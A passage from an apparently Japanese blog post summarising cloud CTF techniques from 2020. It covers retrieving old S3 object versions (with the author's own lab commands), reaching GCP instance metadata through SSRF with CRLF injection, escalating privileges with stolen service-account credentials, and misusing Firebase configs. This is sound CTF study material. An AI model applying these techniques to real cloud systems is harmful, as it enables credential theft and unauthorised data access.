# まずは普通にS3バケットを一覧表示 root@kali:~# aws s3api list-objects --bucket s3-versioning-test-ivcbxvq1hk { "Contents": [ { "Key": "flag.txt", "LastModified": "2021-08-08T03:05:20.000Z", "ETag": "\"9ef7ab536db704fba7129c1066b5b88e\"", "Size": 35, "StorageClass": "STANDARD" } ] } # 次にバージョンを確認 root@kali:~# aws s3api list-object-versions --bucket s3-versioning-test-ivcbxvq1hk { "Versions": [ { "ETag": "\"9ef7ab536db704fba7129c1066b5b88e\"", "Size": 35, "StorageClass": "STANDARD", "Key": "flag.txt", "VersionId": "jnqj4o.d3M7a19XhVrx2suVRe4t6_r..", "IsLatest": true, "LastModified": "2021-08-08T03:05:20.000Z" }, { "ETag": "\"cfb7b2c016dbca5b263ea5322b33594e\"", "Size": 31, "StorageClass": "STANDARD", "Key": "flag.txt", "VersionId": "AqNJTjwwVg1ZJ7mHaAyLuLmgBrlbTyCT", "IsLatest": false, "LastModified": "2021-08-08T03:04:23.000Z" } ] }
VersionId
が取得できたので、過去バージョンのオブジェクトを取得してみます。
# まずはVersionIdを指定せずに取得すると最新版(2世代目)を取得 root@kali:~# aws s3api get-object --bucket s3-versioning-test-ivcbxvq1hk --key flag.txt flag.txt { "AcceptRanges": "bytes", "LastModified": "Sun, 08 Aug 2021 03:05:20 GMT", "ContentLength": 35, "ETag": "\"9ef7ab536db704fba7129c1066b5b88e\"", "VersionId": "jnqj4o.d3M7a19XhVrx2suVRe4t6_r..", "ContentType": "text/plain", "Metadata": {} } root@kali:~# iconv -f SJIS flag.txt バージョン2にアップデートしました! # VersionIdを指定して過去バージョン(1世代目)を取得 root@kali:~# aws s3api get-object --bucket s3-versioning-test-ivcbxvq1hk --key flag.txt --version-id AqNJTjwwVg1ZJ7mHaAyLuLmgBrlbTyCT flag_old.txt { "AcceptRanges": "bytes", "LastModified": "Sun, 08 Aug 2021 03:04:23 GMT", "ContentLength": 31, "ETag": "\"cfb7b2c016dbca5b263ea5322b33594e\"", "VersionId": "AqNJTjwwVg1ZJ7mHaAyLuLmgBrlbTyCT", "ContentType": "text/plain", "Metadata": {} } root@kali:~# iconv -f SJIS flag_old.txt これはバージョン1のファイルです
- writeup
- BalCCon2k20 CTF - Dawsonite
https://github.com/oioki/balccon2k20-ctf/blob/master/web/dawsonite/solution/README.md
- BalCCon2k20 CTF - Dawsonite
GCP
CRLFインジェクションを使用したGCPのインスタンスメタデータへのアクセス
AWSと同様にGCPにもインスタンスメタデータがあります。
GCPでは、インスタンスメタデータにアクセスするにはHTTPリクエストヘッダーにMetadata-Flavor: Google
を付与する必要があります。
これはSSRF対策のためであると考えられます。(なお、AWSでもインスタンスメタデータv2であればHTTPリクエストヘッダーにtokenを付与する必要があります。)
しかし、Balsn CTF 2020のtpcという問題では、SSRFの脆弱性に加えてCRLFインジェクションの脆弱性もあったため、任意のHTTPリクエストヘッダーを付与可能であり、インスタンスメタデータへアクセス可能でした。
- writeup
GCPのインスタンスメタデータから認証情報取得してから権限昇格
インタンスメタデータから他のサービスアカウント(AWSで例えるとアクセスキーIDとシークレットアクセスキーを持つIAMユーザ)の認証情報を取得して、権限昇格する問題です。権限昇格後は、Secret ManagerというサービスからFLAGを取得します。
想定解と非想定解の両方とも参考になります。
- writeup
GCPの認証情報取得後のenumeration
認証情報を取得後に次にどうしたらいいか手詰りになることがありますが、 そういったときにenumeration用のツールを使用すると、効率的・網羅的に確認することができます。
gcp_enum
https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_enum
- writeup
Firebaseで開発されたアプリから情報取得
Firebaseとは、スマホアプリやWebアプリ開発のプラットフォームですが、
クライアントからAPIを呼び出すために、API Key等を含んだfirebaseConfig
オブジェクトを、
JavaScript内に埋め込みます。
X-MAS CTF 2020のThe Big Election Hackという問題では、
このfirebaseConfig
オブジェクト内の情報を使用してAPIを実行し、
新規ユーザ登録や、適切にアクセス制御されていないセキュリティルールを突いて、
Cloud FirestoreやCloud Storage for Firebaseから情報取得する解法でした。
FirebaseのAPIを呼び出すための支援ツールが公開されています。
https://github.com/0xbigshaq/firepwn-tool
- writeup
- X-MAS CTF 2020 - The Big Election Hack
https://github.com/mohamedaymenkarmous/CTF/tree/master/X_MAS_CTF_2020#the-big-election-hack
https://gist.github.com/03sunf/ada95212b624d9354b9f9cc46b14f387
- X-MAS CTF 2020 - The Big Election Hack
最後に
今回は、2018年と2019年のまとめよりも、実機での検証を多めにしました。
月並みな表現ではありますが、やはりwriteupを読むだけでなく自分で手を動かしたことで、より理解が深まったと感じます。この記事には検証が成功した結果しか載せていないですが、そこに至るまでに調査や試行錯誤もしており、その過程で得られる知見やテクニックも有用です。また、検証環境の構築作業を通して、ミドルウェアの知識やテクニックも身に付きました。大部分をDockerで環境構築したため、CTFの競技中に自分の環境で検証したい場合においても簡単に流用できそうです。
さて、昨年も今年も公私ともに忙しく、2020年のまとめの公開が非常に遅れてしまいました。 また、開催期間中のCTFのコンテスト参加も全然できていません。
当然、既に2021年のコンテストは多数開催されているため、writeupも多数公開されているものと想定しています。 2021年のまとめ記事に向けて、早めに読み進めて検証していきたいところです。